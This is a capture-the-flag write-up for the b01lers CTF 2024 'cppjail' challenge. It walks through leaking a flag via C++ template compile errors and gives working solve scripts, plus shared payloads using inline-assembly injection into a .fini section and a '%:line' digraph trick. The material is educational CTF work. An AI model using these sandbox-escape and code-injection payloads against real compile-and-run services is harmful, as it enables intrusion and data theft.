Post

misc/cppjail - b01lers CTF 2024

Taking advantage of templates to escape a C++ jail.

Introduction

This past weekend, I participated with my college CTF team, PBR | UCLA, in b01lers CTF 2024 hosted by Purdue University’s CTF team, b01lers. It was a really fun CTF with a lot of interesting and unique challenges so a big shoutout to the organizing team over at b01lers for putting on a great event! One of the challenges that I found particularly interesting was misc/cppjail since this was the first time I had seen a C++ restricted jail challenge. In the end, only 15 teams were able to solve it (with PBR able to grab the 10th solve) which made it a bit of a tricky challenge. A big shoutout to the author, pawnlord, for coming up with this challenge. I wanted to put together a writeup about this challenge since there were a lot of interesting things I learned to solve this challenge and I hope this could be educational to others who are interested in learning more about C++ and these kinds of challenges.

Prompt

The challenge had the following prompt.

I’ve come to the conclusion that any programmer that would prefer the project to be in C++ over C is likely a programmer that I really would prefer to piss off, so that he doesn’t come and screw up any project I’m involved with. Flag length is 53.

The challenge provided an endpoint to connect to (nc gold.b01le.rs 7003) also had three provided files: flag.h, cppjail.cpp, and compile.py. The contents of these files are shown below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/* ============================== flag.h ============================== */
#define FLAG "bctf{fake_very_very_very_very_very_flag}"

/* =========================== cppjail.cpp =========================== */
#include <type_traits>
#include "flag.h"
#include <cassert>
constexpr char flag[] = FLAG;

template<class b> struct Key {
    short i;
};

template<> struct Key<std::
bool_constant<false>>{
    char i;
};
template<> struct Key<std::
bool_constant<true>> {
    int i;
};
template<char c, int i> struct Lock {
    Key<std::bool_constant<flag[i] == c>>k;
};

template<class, class = void> struct Jail: :: std :: false_type {
    template<char c, int i> using lock=Lock<c, i>;
};
template<class T> class Jail<T, ::std::void_t<decltype(&std::declval<T>())>>: :: std ::true_type{};

class Prisoner {};

#undef FLAG
#define flag

/* you are here */

#include <stdio.h>

int main(void) {
    ::Prisoner prisoner1;
    ::Prisoner prisoner2;
    
    assert((&prisoner1) != (&prisoner2));
    ::printf("Prisoner 2 %p\n", &prisoner1);
    ::printf("Prisoner 1 %p\n", &prisoner1);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# ============================ compile.py ============================

#!/bin/env python3
import os
import time

# # local testing stuff
# input_code = []
# while True:
#     try:
#         line = input()
#     except EOFError:
#         break
#     input_code.append(line)
# input_code = ' '.join(input_code)

input_code = input("Input your code: ")
if len(input_code) > 280:
    print("jail must be less than 280 characters !!!")
    exit()

banned_words = [
    "#", "define", "include",
    "//",
    "ifndef", "ifdef",
    "Lock", "Key",
    "class", "struct",
    "*", "int", "char", "short", "long",    
    " "
]

for word in banned_words:
    if word in input_code:
        print("You can't use " + word + " !!!")
        exit()

code = ""
with open("cppjail.cpp", "r") as cjail:
    code = cjail.read()
    code = code.replace("/* you are here */", input_code)

with open("jail.cpp", "w") as cjail_final:
    cjail_final.write(code)

success = os.system("g++ -o jail jail.cpp 2>&1")
if success != 0:
    print("------ Compile errors, skipping")
    exit()

# prevent bruteforce
time.sleep(5)

os.system("./jail 2>&1")
os.system("rm jail")

Initial Ideas

A few months ago, I had read this interesting old blog post about escaping a series of C jail challenges using a few different techniques which got me thinking about restricted jails within lower-level programming languages. While it was an interesting read (worth checking out), unfortunately, none of these techniques were applicable to this challenge. I tried various initial ideas before moving on later what ended up being the solution. Running through some initial ideas, one idea that I originally had was that since the flag was contained as part of the source code, we could potentially include an I/O library like <iostream> and just print the flag string itself either by referencing the FLAG macro defined in flag.h or the flag variable defined in the source code. An example payload of something that might work in a different challenge is shown below.

1
2
3
4
5
#include <iostream>

void print_flag() {
    std::cout << FLAG << std::endl;
}

However, the challenge very cautiously includes #undef FLAG and #define flag right before the location in the source code you are allowed to inject which makes this approach impossible since the FLAG macro is no longer defined and then the symbol for flag is redefined as a preprocessor macro. Building off this previous information, one idea might be to try adding #undef flag to our injected code so that the preprocessor removes this macro similar to how it did for the FLAG macro so we can just access the flag variable directly.

1
2
3
4
5
6
#undef flag
#include <iostream>

void print_flag() {
    std::cout << flag << std::endl;
}

However, # is a banned character within the compile.py filter which prevents us from using this idea. A funny idea was to take advantage of trigraphs which could allow us to remove some following lines of source code potentionally or bypass some of the character restrictions. However, these are heavily dependent on the version of the compiler we are using (later versions remove this feature due to weird quirks) and this information was not provided as part of the challenge which made it not a likely solution. Another idea was to potentially attempt to gain remote code execution by writing some code to read the flag.h file containing the flag. However, this is also quite hard since although we could try and define whatever functions or code we would like, none of our code would be executed since we do not have the ability to modify the existing main function.

1
2
3
4
5
6
7
8
int main(void) {
    ::Prisoner prisoner1;
    ::Prisoner prisoner2;
    
    assert((&prisoner1) != (&prisoner2));
    ::printf("Prisoner 2 %p\n", &prisoner1);
    ::printf("Prisoner 1 %p\n", &prisoner1);
}

The Prisoner class is referenced inside of the main function but since the class is already defined without any fields or methods, there was no clear way to manipulate the class definition to override something like an overloaded operator or a destructor to execute our code.

One thing that stuck out to me about the source code was its extensive usage of a feature unique to C++ (and not included in C), templates. The fact that the challenge prompt made reference to C++ specifically (in both the name and description), this was a strong indicator that templates were likely a key part of this challenge which I decided to investigate further.

C++ Templates

Before delving into the challenge a bit further, I wanted to add some background information on C++ templates. I recently completed my university’s programming languages course (CS 131 with Prof. Eggert) where we briefly talked about C++ templates as a comparison with Java’s generics so this challenge felt like a good opportunity to apply what I learned. C++’s templates are similar to programming languages with generics in that they allow programmers to write generic function over many types to be efficient when writing code. g++ actually has a few different passes that it goes through when compiling C++ code. The earliest pass involves handling macros and templates using a program known as cpp (the C++ preprocessor). When handling templates, cpp will expand the template code into actual code that can be compiled by the C++ compiler based on how the template is used. For example, if we examine the example code snippet below, if we define the following template.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
using namespace std;

template<typename T>
T add(T a, T b) {
    return a + b;
}

int main() {
    int a = 1;
    int b = 2;
    int res = add<int>(a, b);
    
    cout << res << endl;
    
    string a2 = "a";
    string b2 = "b";
    string res2 = add<string>(a2, b2);
    
    cout << res2 << endl;
}

The example add function uses a C++ template that the cpp program will expand into the following code based on how the template is used.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <iostream>
using namespace std;

int add(int a, int b) {
    return a + b;
}

string add(string a, string b) {
    return a + b;
}

int main() {
    int a = 1;
    int b = 2;
    int res = add(a, b);
    
    cout << res << endl;
    
    string a2 = "a";
    string b2 = "b";
    string res2 = add(a2, b2);
    
    cout << res2 << endl;
}

While this is a useful feature for developers, C++ templates have a few quirks that make it different than generics. Particularly, the notable difference relevant for this challenge involves type checking. In C++, the preprocessor does not perform type checking and this is done by the C++ compiler. This leads to some weird behavior since the preprocessor will expand the template code first which may result in code that does not have valid semantics (e.g. types that don’t match) leading to errors at compile time. We can take advantage of this behavior to escape the jail.

Compilation Oracle

Examining the compile.py challenge infastructure a bit more closely, there actually exists a potential binary oracle that we can take advantage of. The relvant code snippet is shown below.

1
2
3
4
5
6
7
success = os.system("g++ -o jail jail.cpp 2>&1")
if success != 0:
    print("------ Compile errors, skipping")
    exit()

# prevent bruteforce
time.sleep(5)

While the script claims to “prevent bruteforce”, the compilation process actually acts as a binary oracle which allows us to use a side-channel attack to intelligently “brute force” the flag. Specifically, since standard error is redirected to standard output from the compilation process (2>&), we can actually learn whether or not our code compiled successfully with meaningful error messages. While this might be convenient to developers, depending on the content of the error message, we can potentially leak some relevant information about the source code. But what sort of compilation error do we want to generate? This is where quirks with C++ templates come into play.

Examining the source code for C++ templates, there is an interesting template definition that we can use.

1
2
3
4
5
6
7
8
9
10
11
template<> struct Key<std::
bool_constant<false>>{
    char i;
};
template<> struct Key<std::
bool_constant<true>> {
    int i;
};
template<char c, int i> struct Lock {
    Key<std::bool_constant<flag[i] == c>>k;
};

The Lock template is a really powerful primitive since it allows us access the flag variable and specifically check whether or not an arbitrary character in flag matches a character c at an index i. What is important to note is that because C++ templates expand during the preprocessor context, the flag variable is still accessible since the template is included before the #undef FLAG and #define flag which prevents later code from accessing it. This means that if we define a type using the Lock template, it will be expanded in the context before the flag variable is redefined as a preprocessor macro which makes this primitive possible. While we have the ability to use this template as an oracle, how do we exfiltrate this information? If a type is defined in C++ code, it’s not like we can just print it out to the console. This is where using Key comes into play since we can actually use type checking error messages as our side-channel to exfiltrate the flag. The binary oracle I constructed is shown below.

1
2
3
4
5
6
7
// negative result from oracle producing no compilation errors
Lock<'a', 0> tmp;
Key<std::bool_constant<false>> oracle = tmp.k;

// positive result from oracle producing a compilation error
Lock<'b', 0> tmp;
Key<std::bool_constant<false>> oracle = tmp.k;

If flag[i] == c is true, then tmp.k will be of the type Key<std::bool_constant<true>> which will result in a compilation error because it does not type check with Key<std::bool_constant<false>>. If flag[i] == c is false, then tmp.k will be of the type Key<std::bool_constant<false>> which will not result in a compilation error because it type checks with Key<std::bool_constant<false>>. This allows us to exfiltrate the flag character by character by checking whether or not the compilation process produces an error and we can slowly exfiltrate the flag character by character. A quick note is that the sleep inside the compile.py script actually occurs after the compilation process which actually allows us to perform this side-channel attack without any timing delays.

Bypassing the Filter

Unfortunately, the above binary oracle is not enough to exfiltrate the flag since the compile.py script actually filters out a lot of useful tokens that we can use to construct our oracle. Specifically, the following characters are filtered out.

1
2
3
4
5
6
7
8
9
banned_words = [
    "#", "define", "include",
    "//",
    "ifndef", "ifdef",
    "Lock", "Key",
    "class", "struct",
    "*", "int", "char", "short", "long",    
    " "
]

This prevents us from using the Key and Lock types directly as part of our oracle. We also can’t define our own template types directly that emulate the behavior of Key and Lock since the class and struct keywords are also banned (prevent us from creating complicated custom types) and also the context of where the flag symbol is accessible is outside the scope of where we inject in the source code (due again to the pesky #define flag). This inadvertently leads us to attempt to use the provided Jail template to bypass this filter which does have a field which references Lock. The source code for this is shown below.

1
2
3
4
template<class, class = void> struct Jail: :: std :: false_type {
    template<char c, int i> using lock=Lock<c, i>;
};
template<class T> class Jail<T, ::std::void_t<decltype(&std::declval<T>())>>: :: std ::true_type{};

Another thing to note is that since we can’t define our own types using struct or class (these are banned), we are pointed to using the existing Prisoner class definition that exists with the class definition of the Jail template. The syntax for using the Jail template was a bit tricky, particularly the syntax to reference the nested Lock template inside of the Jail template was a bit unfamiliar to me. However, after doing some digging, I found that the syntax to reconstruct our binary oracle is shown below.

1
2
typename Jail<Prisoner>::template lock<'a', 0> oracle;
Key<std::bool_constant<false>> leak = oracle.k;

The above is possible since using lock=Lock<c, i> actually aliases the template Lock to lock which allows us to reference the Lock template inside of the Jail template. However, a remaining problem is that we still are unable to use the Key template which makes the above oracle not usable still. Revisiting the idea behind our binary oracle, our goal was to use type checking errors to exfiltrate the flag character by character. However, what do those type checking errors look like? I worked through this challenge a lot inside of an online C++ compiler (easier to quickly iterate and try different payloads) and using the above oracle, it produced the following error message.

1
2
3
4
5
6
7
# For the binary oracle:
# typename Jail<Prisoner>::template lock<'b', 0> oracle;
# Key<std::bool_constant<false>> leak = oracle.k;

/tmp/OGBDZiEEWf.cpp:32:46: error: conversion from 'Key<integral_constant<[...],true>>' to non-scalar type 'Key<integral_constant<[...],false>>' requested
   32 | Key<std::bool_constant<false>> leak = oracle.k;
      |                                       ~~~~~~~^

As we can see, because the C++ preprocessor evaluates the macros before type checking, the value inside the template for flag[i] == c is actually evaluted before type checking occurs which allows us to view the evaluated value inside of the compilation error message. This is really powerful because since we cannot define our own types to be more precise when trying to set up the above oracle this normally would mean that we cannot have precise error messages only when we have a positive result from the oracle, however, because the preprocessor expands the template before type checking this allows us to view the value of flag[i] == c inside of the compilation error message so we can just view the contents of the error message itself as our binary oracle. The filter restricts a lot of primitive types in addition to building classes and structs but we can still use the bool primitive type so I adjusted the oracle to use the bool type instead of the Key type since we don’t actually care whether or not oracle.k type checks and instead we just want to generate always generate type check errors to use the oracle in the error message exfiltrate the flag.

1
2
typename Jail<Prisoner>::template lock<'a', 0> oracle;
bool leak = oracle.k;

Getting the Flag

I wrote an initial solve script to exfiltrate the flag by brute forcing the flag character by character. The b01lers CTF website provides that the regex for their flags is bctf{[ -~]+} so this allows us to construct a complete alphabet. There are a couple issues though with the above binary oracle due to this alphabet. The filter also restricts the characters # and * which are valid characters within the flag alphabet. This causes a problem if one of the characters in the flag is # or * since we can’t exfiltrate these characters since injecting this into the source code is prevented by the filter (in fact, I was only able to exfiltrate half of the flag initially due to this problem). The final way to bypass this is to use the order (or ASCII value) of each character in the alphabet rather than the actual char itself. This is because within C/C++ since we can represent chars as ints. Special thanks to a couple members of my team (Ronak, Salma, and club alumni Aaron) for helping provide a sanity check to figure out this last part of the challenge. I updated my solve script and managed to finally get the flag! The full solve script is included below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python3
from pwn import *
import re

alphabet = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}'

banned_words = [
    "#", "define", "include",
    "//",
    "ifndef", "ifdef",
    "Lock", "Key",
    "class", "struct",
    "*", "int", "char", "short", "long",    
    " "
]

flag = ""
while len(flag) != 53:
    i = len(flag)
    for c in alphabet:
        log.info(f"Trying {flag + c}")

        r = remote('gold.b01le.rs', 7003)
        payload = f"""
        typename Jail<Prisoner>::template lock<{ord(c)}, {i}> oracle;
        bool leak = oracle.k;
        """.replace('\n', '').replace(' ', '\t')

        # sanity checks
        assert len(payload) <= 280
        for word in banned_words:
            if word in payload:
                log.error("You can't use " + word + " !!!")
                exit()

        r.sendlineafter(b"code:", payload.encode())
        err = r.recvuntil(b'skipping\n').decode()
        r.close()

        m = re.search(r'Key<std::integral_constant<bool, (false|true)> >', err).group(0)
        m = re.search(r'(false|true)', m).group(0)
    
        if m == 'true':
            flag += c
            log.info(f"Flag: {flag}")
            break

log.info(f"Flag: {flag}")
# Flag: bctf{Y0U_4rE_fUll_of_bu11****_C++_1s_@_h0rri8le_lang}

Overall, this challenge was really fun to work on. I thought the idea was really unique and despite the author’s grievances about C++ 💀 (the challenge author followed up that they were just quoting Linux Torvalds rather than stating their own opinion), I thought it was still a really enjoyable challenge to work on!

Post-CTF Discussion

After the CTF finished, I joined the discussion with some other teams for their solutions. There were many unintended solutions to this challenge which made things kind of interesting. I had a laugh at some of the unintended solutions that were shared and I wanted to share some of them here.

Unintended: Exploiting the Binary

Similar to some of the C jail challenges I previously read about, some teams attempted to exploit the compiled binary by injecting shellcode into the source code that popped a shell since the compiled binary was run on the server and they could just read the flag.h file containing the flag. Here was an example payload that was shared by 9x14S after the CTF which involves using the __attribute__ directive as part of payload to inject inline assembly code that pops a shell.

1
2
3
4
5
payload = flat(
    b"void\t__attribute__((section(\".fini\")))_fini(){__asm__(\"" +
    b"movq $1,%rax;movq $1,%rdi;lea (%rip,1),%rsi;movq $0x2500,%rdx;syscall;".replace(b' ', b'\t') +
    b"\");}"
)

Unintended: Digraphs

While I thought about potentially using trigraphs, it turns out that digraphs were actually a valid solution to this challenge. Digraphs are two character sequences that are meant to be treated as a single character. For C++, the digraph %: is equivalent to # which one of the teams used the #line preprocessing directive to inject the flag into the source code and leak the entire flag that way. While trigraphs were removed from the C and C++ language, digraphs apparently still are supported. The payload shown below was shared by Surg.

1
2
%:line 1 "flag.h"
oogabooga

Intended: Using Templates

Templates was intended approach by the author. Some teams tried variants of the idea I used to side channel the flag but instead using static_assert. The author’s intended solution involved purely using templates to exfiltrate each character of the flag. It is more efficient than the easier brute force approach me and some other teams used but it is a bit more complicated to set up the templates correctly. The author’s intended solution is shown below.

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

format = "unsigned    j=0;template<bool    b>using    d=std::bool_constant<b>;using    a=decltype(j);    using    t=d<true>;    using    f=d<false>;template<a    c>a    r(t){return(a)(c-1);}template<a    c>a    r(f){return    r<c+1>(d<sizeof(Jail<void>::lock<c,%d>::k.i)    ==    4>());}a    operator&(Prisoner){return(r<0>(f())+(j++));}"

for i in range(0, 53):
    r = remote("ctf.b01lers.com", 7170)
    code = format % i
    r.sendline(code.encode())
    character = chr(int(r.recvall().split(b" ")[-1], 16) - 3)
    print(character)
    r.close()
This post is licensed under CC BY 4.0 by the author.